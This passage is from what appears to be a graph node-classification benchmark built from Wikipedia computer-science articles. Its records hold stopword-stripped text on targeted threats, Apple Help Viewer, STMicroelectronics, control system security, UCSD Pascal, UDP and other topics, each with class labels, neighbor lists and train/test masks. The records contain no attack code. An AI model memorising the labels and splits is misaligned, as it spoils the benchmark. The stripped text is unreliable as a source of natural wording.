    "text": "Targeted_threat:targeted threat targeted threats class malware destined one specific organization industry type crimeware threats particular concern designed capture sensitive information targeted attacks may include threats delivered via smtp e-mail port attacks zero day attack vulnerability exploits phishing messages government organisations targeted sector financial industries second targeted sector likely cybercriminals desire profit confidential sensitive information financial industry infrastructure houses similarly online brokerage accounts also targeted attacks impact targeted attacks far-reaching addition regulatory sanctions imposed hipaa sarbanes-oxley gramm-leach-bliley act laws lead loss revenue focus corporate momentum expose sensitive customer data damage corporate reputations incur potential lawsuits contrast widespread spam attack widely noticed targeted attacks sent limited number organizations crimeware threats tend reported thus elude malware scanners",
    "neighbors": [
      8387,
      612,
      5636,
      8971,
      7515
    ],
    "mask": "Train"
  },
  {
    "node_id": 11402,
    "label": 2,
    "text": "Apple_Help_Viewer:apple help viewer help viewer webkit based html viewer macos aimed displaying help files documentation found /system/library/coreservices/help viewer.app default file extension .help help index files generated help indexer macos applications typically use help viewer display help content rather custom system help viewer implementation mac os x 10.5 leopard found way rob griffiths list leopard criticisms apple changed software standalone application standard window interface one floating window always appears front application windows obscuring interface one seeking help see image although one close minimize help viewer window difficult consult help viewer simultaneously working application short changing size windows fit screen help viewer window also work exposé window management feature mission control os x 10.7 later workaround using defaults command accessible terminal",
    "neighbors": [
      4615,
      5647,
      1042,
      6700,
      4657,
      1074,
      576,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      2149,
      8303,
      6771,
      2676,
      9343,
      3719,
      10888,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      9430,
      3289,
      4318,
      231,
      9451,
      2288,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      10512,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      9529,
      4933,
      9035,
      1878,
      4457,
      9100,
      9109,
      2456,
      1439,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163
    ],
    "mask": "None"
  },
  {
    "node_id": 11403,
    "label": 9,
    "text": "Zenith_Parsing_Engine:zenith parsing engine zpe programming environment simply zpe formally zenith parsing engine general purpose compiler parser interpreter yass scripting language designed educational use well simple syntax originally created jamie balfour 2015 replacement another programming language developing time known blackrabbit script zpe yass designed help automation scripts clearing inconsistent syntaxes scripting languages zenithparser powers underlying parsers including csv json xml parsers language interpreted zpe runtime known yass yet another simple syntax several languages influenced yass syntax including c php java javascript vb.net c .net sml python remained largely since version 1.5 zpe programming environment written java making cross-platform side effect certain plugins built-in objects completely written java whilst zpe closed source standard library open-source written yass",
    "neighbors": [
      1952,
      9345,
      8644,
      3462,
      8554,
      5612,
      5677,
      7983,
      9780,
      5397,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 11404,
    "label": 7,
    "text": "RPR_FOM:rpr fom real-time platform reference federation object model rpr fom enables linking computer simulations discrete physical entities complex virtual worlds high-level architecture hla federation object model developed distributed simulation applications defense security rpr fom listed nato modelling simulation standards profile amsp-01 rpr fom provides backwards compatibility simulations using distributed interactive simulation dis standard standardized simulation interoperability standards organization siso siso-std-001-2015 standard consists two parts high-level architecture introduced us department defense 1996 rpr fom effort initiated facilitate migration dis hla rpr fom version 1.0 released 1998 supports capabilities dis version ieee 1278.1-1995 dis 5 standard provides fom supporting hla version 1.3 rpr fom version 2.0 released 2015 siso-std-001 rpr fom 2.0 supports capabilities dis version ieee 1278.1a-1998 dis 6 development rpr fom 2.0 started 2000 came halt 2007 resulting widely used draft version 17 work restarted 2012 finalized published standard 2015 standard provides foms supporting following hla versions 1.3 ieee 1516-2000 ieee 1516-2010 “ hla evolved ” modular monolithic formats rpr fom version 3.0 development started 2016 siso dis rpr fom product support group 2018 development handed dedicated product development group goal rpr fom version 3.0 support capabilities dis version ieee 1278.1-2012 dis 7 rpr fom defines information exchanged runtime number fom modules additional supporting modules include foundation module basic data types enumerations module enumerations like types platforms equipment base module commonly used data types generic object classes switches module runtime switches rti rpr fom related number standards",
    "neighbors": [
      2728,
      7045
    ],
    "mask": "Test"
  },
  {
    "node_id": 11405,
    "label": 3,
    "text": "STMicroelectronics:stmicroelectronics stmicroelectronics french-italian multinational electronics semiconductor manufacturer headquartered geneva switzerland commonly called st europe largest semiconductor chip maker based revenue stmicroelectronics corporate headquarters headquarters emea region based geneva holding company stmicroelectronics n.v. registered amsterdam netherlands company us headquarters coppell texas headquarters asia-pacific region singapore whilst japan korea operations headquartered tokyo company headquarters greater china region shanghai st formed 1987 merger two government-owned semiconductor companies sgs microelettronica società generale semiconduttori italy thomson semiconducteurs semiconductor arm france thomson sgs microelettronica originated 1972 previous merger two companies thomson semiconducteurs created 1982 french government widespread nationalisation industries included time merger company named sgs-thomson took current name may 1998 following thomson ’ sale shares creation st ranked 14th among top 20 semiconductor suppliers sales around us 850 million company participated consolidation semiconductor industry since formation acquisitions including december 8 1994 company completed initial public offering paris new york stock exchanges owner thomson sa sold stake company 1998 company also listed borsa italiana milan 2002 motorola tsmc joined st philips new technology partnership crolles2 alliance created new 12 wafer manufacturing facility located crolles france 2005 st ranked fifth behind intel samsung texas instruments toshiba ahead infineon renesas nec nxp freescale company largest european semiconductors supplier ahead infineon nxp early 2007 nxp formerly philips semiconductors freescale formerly motorola semiconductors decided stop participation crolles2 alliance terms agreement alliance came end december 31 2007 may 22 2007 st intel created joint venture memory application called numonyx new company merged st intel flash memory activities semiconductor market consolidation continued st nxp announcing april 10 2008 creation new joint venture mobile activities st owning 80 new company nxp 20 joint venture began august 20 2008 february 10 2009 st ericsson joint venture bringing together st-nxp wireless ericsson mobile platforms established 2011 st announced creation joint lab sant'anna school advanced studies lab focus research innovation bio-robotics smart systems microelectronics past collaborations sant'anna school advanced studies included dustbot platform integrated self-navigating service robots waste collection st ericsson multinational manufacturer wireless products semiconductors supplying mobile device manufacturers st-ericsson 50/50 joint venture ericsson stmicroelectronics established february 3 2009 dissolved august 2 2013 headquartered geneva switzerland fabless company outsourcing semiconductor manufacturing foundry companies december 31 2014 shareholders following earlier failure stmicroelectronics stayed volatile markets dram pc microprocessors 1994 attempted launch compatible intel 80486 microprocessors partnership american company cyrix model one completed 1995 cyrix m1 microprocessor intended compete intel pentium family achieve success however pc-compatible x86 embedded systems market stpc soc line culminating 486-class stpc atlas reached end-of-life 2008 unlike so-called fabless semiconductor companies stmicroelectronics owns operates semiconductor wafer fabs company owned five 8 inch 200 mm wafer fabs one 12 inch 300 mm wafer fab 2006 production scaled 0.18 µm 0.13 µm 90 nm 65 nm measurements transistor gate length stmicroelectronics also owns back-end plants silicon dies assembled bonded plastic ceramic packages major sites include grenoble one company important r centres employing around 4,000 staff polygone site employs 2200 staff one historical bases company ex sgs historical wafer fab lines closed site hosts headquarters many divisions marketing design industrialization important r center focused silicon software design fab process development crolles site hosts fab originally built common r center submicrometre technologies part 1990 grenoble 92 partnership sgs-thomson cnet r center french telecom company france telecom fab known crolles 1 company first built part 1991 partnership sgs-thomson philips develop new manufacturing technologies crolles 1 opened september 9 1993 gérard longuet french minister industry fab inaugurated french president jacques chirac february 27 2003 includes r center focuses developing new nanometric technology processes 90 nm 32 nm scale using wafers developed crolles 2 alliance alliance stmicroelectronics tsmc nxp semiconductors formerly philips semiconductor freescale formerly motorola semiconductor partnered 2002 develop facility work together process development technologies developed facility also used global semiconductor foundry tsmc taiwan allowing tsmc build products developed crolles behalf alliance partners required foundry capacity new fab construction since 2015 employing around 3,000 staff rousset hosts several division headquarters including smartcards microcontrollers eeprom well several r centers rousset also hosts 8-inch 200 mm fab opened may 15 2000 french prime minister lionel jospin site opened 1979 fab operated eurotechnique joint venture saint-gobain france national semiconductor us rousset sold thomson-csf 1982 part french government 1981-82 nationalization several industries part nationalisation former thomson plant center aix-en-provence operating since 1960s closed staff transferred new rousset site original fab upgraded later fab 1996 shut 1988 small group employees thomson rousset plant including director marc lassus founded start-up company gemalto formerly known gemplus became leader smartcard industry employing 1,500 staff site hosts fab r centers employing 6,000 staff milan facilities match grenoble importance agrate brianza employs around 4000 staff historical base company ex sgs site several fab lines including fab r center castelletto employs 300 400 staff hosts divisions r centers update-2012 numonyx jv intel acquired micron r2 fab agrate previous r 200mm fab currently micron entity catania plant sicily employs 5,000 staff hosts several r centers divisions focusing flash memory technologies well two fabs plant launched 1961 ates supply licensing rca us initially using germanium site two major wafer fabs fab opened april 1997 romano prodi president italian council fab never completed transferred current state numonyx 2008 facility caserta italy manufacture esim sim cards.centre excellence stmicro purposes 2010 st employed 1,500 people kirkop making largest private sector employer country leading exporter 1970 sgs created first assembly back-end plant singapore area toa payoh 1981 sgs decided build wafer fab singapore singapore technical engineers trained italy fab ang mo kio started produce first wafers 1984 converted fab important wafer fab group ang mo kio also hosts design centers site currently employs 6000 staff update-2012 numonyx jv intel acquired micron 2010 amk8 fab 200mm hvm fab currently micron entity amk5 amk6 remains stm entities update-2019 amk8 reacquired stm micron application design support 110 employees divisions mcd phoenix arizona 8 inch 200 mm fab carrollton texas 6 inch 150 mm fab sebaa morocco fab beginning rampdown plans destined close 2010 casablanca morocco site consists two assembly parts bouskoura aïn sebaâ totals around 4000 employees opened 1960s thomson bristol united kingdom site employing well 300 peak 2001/2 ramped approx 150 employees close early 2014 ottawa ontario canada plant approx 450 employees close 2013 end stmicroelectronics involved project produce plastic solar cells employ matrix carbon nanotubes convert photons electrical power",
    "neighbors": [
      7170,
      6276,
      9863,
      6539,
      7820,
      9745,
      1298,
      2838,
      666,
      8355,
      5028,
      4773,
      3883,
      3117,
      8237,
      9137,
      7604,
      5686,
      7354,
      6715,
      7745,
      7235,
      1221,
      2506,
      9163,
      7246,
      11094,
      4569,
      2524,
      7008,
      1377,
      9057,
      7269,
      3050,
      9964,
      10606,
      3185,
      499,
      9851,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 11406,
    "label": 9,
    "text": "Theano_(software):theano software theano python library optimizing compiler manipulating evaluating mathematical expressions especially matrix-valued ones theano computations expressed using numpy-esque syntax compiled run efficiently either cpu gpu architectures theano open source project primarily developed montreal institute learning algorithms mila université de montréal 28 september 2017 pascal lamblin posted message yoshua bengio head mila major development would cease 1.0 release due competing offerings strong industrial players theano 1.0.0 released 15 november 2017 following code original theano example defines computational graph 2 scalars b type double operation addition creates python function f actual computation import theano theano import tensor tensor.dscalar b tensor.dscalar c b f theano.function b c assert 4.0 == f 1.5 2.5",
    "neighbors": [
      1952,
      4417,
      8514,
      7684,
      5830,
      4840,
      9320,
      8554,
      2804,
      823,
      9944,
      63
    ],
    "mask": "Test"
  },
  {
    "node_id": 11407,
    "label": 4,
    "text": "Daniel_B._Cid:daniel b. cid daniel b. cid tech entrepreneur open source developer book author cid founded ossec open source intrusion detection system 2004 led project acquired trend micro third brigade june 16 2008 founded sucuri 2010 web site security company served chief technology officer acquired godaddy mar 22 2017 cid wrote host-based intrusion detection guide book cid also founder cleanbrowsing dns filter advisor alienvault",
    "neighbors": [
      4772,
      2887,
      186,
      7035,
      127
    ],
    "mask": "None"
  },
  {
    "node_id": 11408,
    "label": 5,
    "text": "Google_Wave_Federation_Protocol:google wave federation protocol wave federation protocol formerly google wave federation protocol open protocol extension extensible messaging presence protocol xmpp used apache wave designed near real-time communication computer supported cooperative work wave servers still currently development wave federation protocol open protocol intended parallel openness email protocol waves may succeed email dominant form internet communication since protocol open anyone become wave provider share waves others like email communication possible regardless provider instance organizations operate wave providers members individual run private wave server single user family members internet service provider run wave service another internet service users supplement email im ftp etc model google wave one many wave providers java source code google wave federation prototype server released mercurial repository july 2009 apache license 2.0 features extensible messaging presence protocol inherited wave federation protocol discovery ip addresses port numbers using domain name system dns srv records tls authentication encryption connections xmpp transport encrypts operations transport level provides cryptographic security servers connected directly additional layer cryptography provides end-to-end authentication wave providers using cryptographic signatures certificates allowing wavelet providers verify properties operation therefore downstream wave provider verify wave provider spoofing wavelet operations able falsely claim wavelet operation originated user another wave provider originated different context addresses situation two users different trustworthy wave providers participants wavelet hosted malicious provider protocol requires participant sign user operations certificate signatures operations forwarded host evaluated participants stop malicious hosts altering spoofing contents messages user services signatures verifications done wave providers client software end users waves wavelets child waves identified globally unique wave id domain name id string domain name identifies wave provider wave originated waves wavelets hosted wave provider creator wavelets wave hosted different wave providers however user data federated i.e. shared wave providers private reply wavelets also possible participants knowledge access private wavelet sent users wave provider federated regardless parent wave hosted wave provider operates wave service one networked servers central pieces wave service wave store stores wavelet operations wave server resolves wavelet operations operational transformation writes reads wavelet operations wave store typically wave service serves waves users wave provider connect wave service frontend purpose federation wave service shares waves participants providers communicating wave provider servers copies wavelets distributed wave providers participants given wavelet copies wavelet particular provider either local remote use term refer two types wavelet copies cases referring wavelet copy wavelet wave view contain local remote wavelet copies simultaneously originating wave server responsible hosting processing wavelet operations submitted local participants remote participants wave providers wave server performs concurrency control ordering submitted wavelet operations relative using operational transformation also validates operations applying local wavelet remote wavelets hosted providers cached updated wavelet operations local provider gets remote host local participant submits wavelet operation remote wavelet wave server forwards operation wave server hosting provider transformed applied operation echoed back applied cached copy wave services use federation gateways federation proxy components communicate share waves wave providers federation gateways communicate local wavelet operations push new local wavelet operations remote wave providers participants fulfill requests old wavelet operations process wavelet operations submission requests federation proxy communicates remote wavelet operations component wave provider communicates federation gateway remote providers receives new wavelet operations pushed providers requests old wavelet operations submits wavelet operations providers",
    "neighbors": [
      10242,
      4995,
      3460,
      5251,
      5382,
      5892,
      7816,
      4746,
      1036,
      5262,
      8719,
      5524,
      7700,
      10645,
      3610,
      1435,
      3228,
      8858,
      10525,
      10271,
      3105,
      2978,
      4901,
      1959,
      9511,
      1962,
      3499,
      10284,
      5677,
      9519,
      1203,
      8758,
      5431,
      1467,
      7364,
      10748,
      574,
      7359,
      6208,
      1218,
      196,
      3269,
      3782,
      2887,
      2760,
      6855,
      1738,
      4683,
      2892,
      6982,
      11590,
      11343,
      3664,
      3795,
      3284,
      1240,
      8413,
      4318,
      479,
      6367,
      2658,
      3812,
      4068,
      6628,
      9572,
      6632,
      5483,
      236,
      9967,
      9712,
      9970,
      4725,
      8821,
      3959,
      7928,
      3836
    ],
    "mask": "Test"
  },
  {
    "node_id": 11409,
    "label": 4,
    "text": "Control_system_security:control system security control system security prevention intentional unintentional interference proper operation industrial automation control systems control systems manage essential services including electricity petroleum production water transportation manufacturing communications rely computers networks operating systems applications programmable controllers could contain security vulnerabilities 2010 discovery stuxnet worm demonstrated vulnerability systems cyber incidents united states governments passed cyber-security regulations requiring enhanced protection control systems operating critical infrastructure control system security known several names scada security pcn security industrial network security control system cyber security insecurity vulnerabilities inherent industrial automation control systems iacs lead severe consequences categories safety loss life personal injury environmental impact lost production equipment damage information theft company image guidance assess evaluate mitigate potential risks provided application many governmental regulatory industry documents global standards addressed industrial automation control systems become far vulnerable security incidents due following trends occurred last 10 15 years cyber threats attack strategies automation systems changing rapidly fortunately regulation control system security rare regulation slow moving process united states example nuclear power chemical industries u.s. government computer emergency readiness team us-cert originally instituted control systems security program cssp national cybersecurity communications integration center nccic industrial control systems made available large set free national institute standards technology nist standards documents regarding control system security isa/iec-62443 series standards technical reports related information define procedures implementing electronically secure industrial automation control systems iacs guidance applies end-users i.e asset owner system integrators security practitioners control systems manufacturers responsible manufacturing designing implementing managing industrial automation control systems documents originally referred ansi/isa-99 isa99 standards created international society automation isa 99 committee accredited publicly released american national standards institute ansi documents 2010 renumbered ansi/isa-62443 series change intended align isa ansi document numbering corresponding international electrotechnical commission iec standards isa work products numbered using convention “ isa-62443-x-y ” previous isa99 nomenclature maintained continuity purposes isa99 remains name industrial automation control system security committee isa since 2002 committee developing multi-part series standards technical reports subject iacs security work products submitted isa approval publishing ansi also submitted iec consideration standards specifications iec 62443 series following iec standards development process iec-62443 cybersecurity standards result iec standards creation process ansi/isa-62443 proposals submitted country committees review done comments regarding changes submitted comments reviewed various iec 62443 committees comments discussed changes made agreed upon many members iec committees persons isa s99 committees date fundamental concepts original ansi/isa 62443 documents utilized standards used practitioners several industries design evaluate automation systems cybersecurity resilience several standards used personnel engineering process product system cybersecurity certification programs also called conformity assessment programs certifications awarded accredited certification bodies cb operate following iso/iec 17065 iso/iec 17025 certification bodies accredited perform auditing assessment testing work accreditation body ab often one national ab country abs operate per requirements iso/iec 17011 standard contains requirements competence consistency impartiality accreditation bodies accrediting conformity assessment bodies abs typically members international accreditation forum iaf work management systems products services personnel accreditation international laboratory accreditation cooperation ilac laboratory accreditation multilateral recognition arrangement mla abs ensure global recognition accredited cbs isci created first conformity assessment scheme commonly known certification scheme isa s99 iacs cybersecurity standards program certifies commercial off-the-shelf cots iacs products systems addressing securing iacs supply chain exida united states first organization accredited isci scheme american national standards institute ansi followed control systems security center – certification laboratory cssc-cl accredited japan accreditation board jab tüv rheinland accredited deutsche akkreditierungsstelle dakks ab organizations members iaf two cots product certifications available isasecure® brand isasecure-csa component security assurance certifying automation products 62443-4-1 62443-4-2 iacs cybersecurity standards isasecure-ssa system security assurance certifying iacs systems iec 62443-3-3 standard third certification sdla secure development lifecycle assurance available isci certifies iacs development organizations 62443-4-1 cybersecurity standard providing assurances supplier organization institutionalized cybersecurity product development practices isasecure 62443 conformity assessment scheme iso 17065 program whose labs certification bodies cb independently accredited ansi/anab jab global iso 17011 accreditation bodies ab certification labs must also meet iso 17025 lab accreditation requirements ensure consistent application certification requirements recognized tools mutual recognition arrangements mra iaf ilac others accreditation isasecure labs isa 17011 accreditation bodies ensures certificates issued isasecure labs globally recognized isasecure scheme includes process recognizing test tools ensure tools meet functional requirements necessary sufficient execute required product tests test results consistent among recognized tools isci development processes include maintenance policies ensure isasecure certifications remain alignment iec 62443 standards evolve iec 62443 standards designed horizontally address technical cybersecurity requirements cross-section industries isasecure scheme ’ certification requirements working groups include subject matter experts chemical oil gas industries reflective cybersecurity needs isci published 2017 study confirmed applicability iec 62443 standards isasecure certification building management systems resulting study executive summary ppt available free download www.isasecure.org website isci added leading bms suppliers membership established bms working group support ongoing expansion isasecure certifications bms iec 62443 certification schemes also established several global certification bodies defined scheme based upon referenced standards procedures programs offered globally several recognized cbs including exida tüv rheinland tüv sud tüv nord sgs-tüv saar",
    "neighbors": [
      3843,
      5636,
      5002,
      939,
      11662,
      6360
    ],
    "mask": "Test"
  },
  {
    "node_id": 11410,
    "label": 3,
    "text": "TurnKey_Linux_Virtual_Appliance_Library:turnkey linux virtual appliance library turnkey linux virtual appliance library free open source project developed range debian-based pre-packaged server software appliances a.k.a virtual appliances turnkey appliances deployed virtual machine range hypervisors supported cloud computing infrastructures including aws others installed physical computers project currently maintains around 100 virtual appliances freely licensed ready-to-use solution optimized ease use daily automatic security updates full backup capabilities built appliance designed work little configuration required packaged several formats optimized several different virtualization platforms addition two separate builds installing onto physical media non-virtualized hard disk usb hybrid iso onto amazon ec2 cloud pre-integrated server applications include lamp wordpress joomla drupal redmine mysql mediawiki domain controller file server ruby rails phpbb many others founded engineers israeli startup project conceived mid-2008 community-oriented open source project would focus helping users piece together turnkey solutions open source components largest linux distributions according one turnkey linux co-founders project part inspired desire provide open source alternatives proprietary virtual appliance vendors would aligned user interests could engage community project launched september 2008 three prototype appliances drupal joomla lamp based ubuntu 8.04.1 build following months usability improved dozen additional appliances released including ruby rails mediawiki django october 2009 project released 40 appliances based ubuntu 8.04.3 including 25 new additions virtual appliance library release included support amazon elastic compute cloud new virtual machine image format ovf support turnkey linux listed winner 2009 bossies infoworld one top 40 open source products year september 2010 official unveiling tklbam turnkey linux backup migration took place blog post describing goal ideal backup system according liraz siri many features described author along videos demonstrate functionality backup system november 2010 additions tklbam announced including integration webmin discussed future feature original unveiling tklbam turnkey linux nominated sourceforge february 2012 project month august 2012 version 12.0 released library increased include 100 appliances release also marked move away ubuntu underlying operating system debian 6.0 a.k.a squeeze move cited various reasons particularly security early june 2013 saw significant change tack version 12.1 update release built new tkldev open build infrastructure release also included first x86-64 builds later month turnkey linux custom application code moved github also included tracker appliances bug reports promised mid july turnkey linux released image building appliance tkldev well additional separate github account house appliance specific code used tkldev build appliances november 2013 saw release v13.0 based debian 7.2 a.k.a wheezy september 2015 saw long overdue release v14.0 based debian 8.2 a.k.a jessie followed april 2016 maintenance release v. 14.1 based debian 8.4 turnkey virtual appliances start life stripped debian bootstrap versions previous v12.0 based ubuntu added turnkey core includes common features project virtual appliances including turnkey core footprint approximately 110 mb available separate download application software installed top core typically increases size virtual appliance approximately 160 mb downloading installing appliance package hard drive intended developers administrators would gain easy method setting dedicated server new software appliances customised appliances developed forking appropriate appliance build code github built using tkldev additionally appliances also customized extended using tklpatch simple appliance modification mechanism turnkey linux run virtual machine virtualbox vmware although former described provided documentation",
    "neighbors": [
      5380,
      8837,
      6153,
      7435,
      10127,
      2321,
      5397,
      4887,
      10394,
      8476,
      8554,
      673,
      3745,
      10530,
      9253,
      10149,
      295,
      11305,
      7854,
      2738,
      4790,
      439,
      56,
      59,
      7483,
      10860,
      318,
      3903,
      9324,
      4673,
      10687,
      11201,
      2375,
      4039,
      1353,
      5962,
      5067,
      8907,
      9806,
      7248,
      11388,
      3794,
      11221,
      1110,
      9562,
      9693,
      2910,
      2914,
      4194,
      6371,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      5356,
      7020,
      7022,
      2671,
      7534,
      7920,
      8177,
      5363,
      4724,
      7027,
      9074,
      8439,
      9461,
      6393,
      3068,
      8957,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 11411,
    "label": 2,
    "text": "UCSD_Pascal:ucsd pascal ucsd pascal pascal programming language system runs ucsd p-system portable highly machine-independent operating system ucsd pascal first released 1977 developed university california san diego ucsd 1977 university california san diego ucsd institute information systems developed ucsd pascal provide students common environment could run available microcomputers well campus dec pdp-11 minicomputers operating system became known ucsd p-system ucsd p-system one three operating systems along pc dos cp/m-86 ibm offered original ibm pc vendor softech microsystems emphasized p-system application portability virtual machines 20 cpus ibm pc release predicted users would able use applications purchased future computers running p-system advertisements called universal operating system pc magazine denounced ucsd p-system ibm pc stating review context mba written language simply produce good code p-system sell well ibm pc lack applications expensive choices previously ibm offered ucsd p-system option displaywriter 8086-based dedicated word processing machine confused ibm displaywrite word processing software displaywriter native operating system developed completely internally opened end-user programming notable extensions standard pascal include separately compilable units string type extensions influenced design ada language intrinsics provided accelerate string processing e.g scanning array particular search pattern language extensions provided allow ucsd p-system self-compiling self-hosted ucsd pascal based p-code machine architecture contribution early virtual machines extend p-code away roots compiler intermediate language full execution environment ucsd pascal p-machine optimized new small microcomputers addressing restricted 16-bit 64 kb memory james gosling cites ucsd pascal key influence along smalltalk virtual machine design java virtual machine ucsd p-system achieved machine independence defining virtual machine called p-machine pseudo-machine many users began call pascal-machine like os—although ucsd documentation always used pseudo-machine instruction set called p-code pseudo-code urs ammann student niklaus wirth originally presented p-code phd thesis ucsd implementation derived zurich pascal-p implementation ucsd implementation changed zurich implementation byte oriented ucsd p-code optimized execution pascal programming language hardware platform needed p-code interpreter program written port entire p-system tools run later versions also included additional languages compiled p-code base example apple computer offered fortran compiler written silicon valley software sunnyvale california producing p-code ran apple version p-system later telesoft also located san diego offered early ada development environment used p-code therefore able run number hardware platforms including motorola 68000 system/370 pascal microengine ucsd p-system shares concepts current java platform use virtual machine hide operating system hardware differences use programs written virtual machine provide cross-platform support likewise systems allow virtual machine used either complete operating system target computer run box another operating system ucsd pascal compiler distributed part portable operating system p-system ucsd p-system began around 1974 idea ucsd kenneth bowles believed number new computing platforms coming time would make difficult new programming languages gain acceptance based ucsd pascal pascal-p2 release portable compiler zurich particularly interested pascal language teach programming ucsd introduced two features important improvements original pascal variable length strings units independently compiled code idea included then-evolving ada programming language niklaus wirth credits p-system ucsd pascal particular popularizing pascal release turbo pascal ucsd version started slip first place among pascal users pascal dialect ucsd pascal came subset pascal implemented pascal-p2 designed full implementation language rather minimum subset would self-compile fit function bootstrap kit pascal compilers ucsd added strings basic several implementation dependent features although ucsd pascal later obtained many features full pascal language pascal-p2 subset persisted dialects notably borland pascal copied much ucsd dialect four versions ucsd p-code engine several revisions p-system ucsd pascal revision p-code engine i.e. p-machine meant change p-code language therefore compiled code portable different p-machine versions revision represented leading roman numeral operating system revisions enumerated dot number following p-code roman numeral example ii.3 represented third revision p-system running second revision p-machine original version never officially distributed outside university california san diego however pascal sources versions i.3 i.5 freely exchanged interested users specifically patch revision i.5a known one stable widely distributed available many early microcomputers numerous versions included apple ii dec pdp-11 zilog z80 mos 6502 based machines motorola 68000 ibm pc version ii pc restricted one 64k code segment one 64k stack/heap data segment version iv removed code segment limit cost lot br project members era include dr kenneth l bowles mark allen richard gleaves richard kaufmann pete lawrence joel mccormack mark overgaard keith shillington roger sumner john van zandt custom version written western digital run pascal microengine microcomputer included support parallel processes first time commercial version developed sold softech based version ii include changes version iii sell well due combination pricing structure performance problems due p-code interpreter competition native operating systems top often ran softech dropped product picked pecan systems relatively small company formed p-system users fans sales revived somewhat due mostly pecan reasonable pricing structure p-system ucsd pascal gradually lost market native operating systems compilers available ti-99/4a equipped p-code card commodore pet corvus systems computer used ucsd pascal user software innovative concept constellation os run pascal interpretively compiled include common software manual users could modify needed using open source default era",
    "neighbors": [
      512,
      5634,
      2179,
      5260,
      6414,
      8082,
      6675,
      6558,
      5663,
      1952,
      8868,
      428,
      5677,
      6829,
      7983,
      9008,
      7479,
      8510,
      8767,
      2627,
      8262,
      8524,
      10703,
      217,
      7775,
      7269,
      5612,
      6129,
      7281,
      5363,
      9714,
      4341,
      3960,
      1145,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 11412,
    "label": 9,
    "text": "Chipmunk_Basic:chipmunk basic chipmunk basic freeware version basic programming language maintained developer ron nicholson chipmunk basic originally developed apple macintosh ported linux windows windowed macintosh version includes wide variety graphics drawing commands also object-oriented capabilities current version chipmunk basic spinoff products palm os cbaspad hotpaw basic based public domain pascal implementation david gillespie author pascal translation tool p2c january 2015 cocoa version released may lack features older carbon-based os x port",
    "neighbors": [
      3718,
      7691,
      1805,
      6797,
      9997,
      786,
      22,
      3736,
      3481,
      9881,
      797,
      3233,
      11683,
      5925,
      8101,
      4136,
      10666,
      8494,
      303,
      7343,
      11315,
      823,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      8262,
      10750,
      712,
      8524,
      847,
      1879,
      92,
      11229,
      2915,
      9188,
      5733,
      11243,
      2541,
      8429,
      8303,
      5747,
      759,
      6778,
      6910,
      1535
    ],
    "mask": "None"
  },
  {
    "node_id": 11413,
    "label": 5,
    "text": "User_Datagram_Protocol:user datagram protocol computer networking user datagram protocol udp one core members internet protocol suite protocol designed david p. reed 1980 formally defined udp computer applications send messages case referred datagrams hosts internet protocol ip network prior communications required order set communication channels data paths udp uses simple connectionless communication model minimum protocol mechanisms udp provides checksums data integrity port numbers addressing different functions source destination datagram handshaking dialogues thus exposes user program unreliability underlying network guarantee delivery ordering duplicate protection error-correction facilities needed network interface level application may use transmission control protocol tcp stream control transmission protocol sctp designed purpose udp suitable purposes error checking correction either necessary performed application udp avoids overhead processing protocol stack time-sensitive applications often use udp dropping packets preferable waiting packets delayed due retransmission may option real-time system udp simple message-oriented transport layer protocol documented although udp provides integrity verification via checksum header payload provides guarantees upper layer protocol message delivery udp layer retains state udp messages sent reason udp sometimes referred unreliable datagram protocol transmission reliability desired must implemented user application number udp attributes make especially suited certain applications applications use datagram sockets establish host-to-host communications application binds socket endpoint data transmission combination ip address port way udp provides application multiplexing port software structure identified port number 16 bit integer value allowing port numbers 0 65535 port 0 reserved permissible source port value sending process expect messages response internet assigned numbers authority iana divided port numbers three ranges port numbers 0 1023 used common well-known services unix-like operating systems using one ports requires superuser operating permission port numbers 1024 49151 registered ports used iana-registered services ports 49152 65535 dynamic ports officially designated specific service may used purpose may also used ephemeral ports software running host may use dynamically create communications endpoints needed udp header consists 4 fields 2 bytes 16 bits use checksum source port fields optional ipv4 pink background table ipv6 source port field optional method used compute checksum defined words 16-bit words summed using one complement arithmetic add 16-bit values addition carry-out 17th bit produced swing 17th carry bit around add least significant bit running total finally sum one complemented yield value udp checksum field checksum calculation results value zero 16 bits 0 sent one complement 1s zero-value checksum indicates checksum calculated difference ipv4 ipv6 pseudo header used compute checksum checksum optional ipv6 udp runs ipv4 checksum computed using pseudo header contains information real ipv4 header pseudo header real ipv4 header used send ip packet used checksum calculation source destination addresses ipv4 header protocol udp see list ip protocol numbers 17 0x11 udp length field length udp header data field data stands transmitted data udp checksum computation optional ipv4 checksum used set value zero udp runs ipv6 checksum mandatory method used compute changed documented computing checksum pseudo header used mimics real ipv6 header source address one ipv6 header destination address final destination ipv6 packet contain routing header destination address ipv6 header otherwise originating node address last element routing header receiving node destination address ipv6 header value next header field protocol value udp 17 udp length field length udp header data lacking reliability udp applications must generally willing accept loss errors duplication applications tftp may add rudimentary reliability mechanisms application layer needed often udp applications employ reliability mechanisms may even hindered streaming media real-time multiplayer games voice ip voip examples applications often use udp particular applications loss packets usually fatal problem application requires high degree reliability protocol transmission control protocol may used instead voip example latency jitter primary concerns use tcp would cause jitter packets lost tcp provide subsequent data application requesting re-sending missing data using udp end user applications must provide necessary handshaking real time confirmation message received numerous key internet applications use udp including domain name system dns queries must fast consist single request followed single reply packet simple network management protocol snmp routing information protocol rip dynamic host configuration protocol dhcp voice video traffic generally transmitted using udp real-time video audio streaming protocols designed handle occasional lost packets slight degradation quality occurs rather large delays lost packets retransmitted tcp udp run network many businesses finding recent increase udp traffic real-time applications hindering performance applications using tcp point sale accounting database systems tcp detects packet loss throttle back data rate usage since real-time business applications important businesses developing quality service solutions seen crucial vpn systems openvpn may use udp implementing reliable connections error checking application level transmission control protocol connection-oriented protocol means requires handshaking set end-to-end communications connection set user data may sent bi-directionally connection user datagram protocol simpler message-based connectionless protocol connectionless protocols set 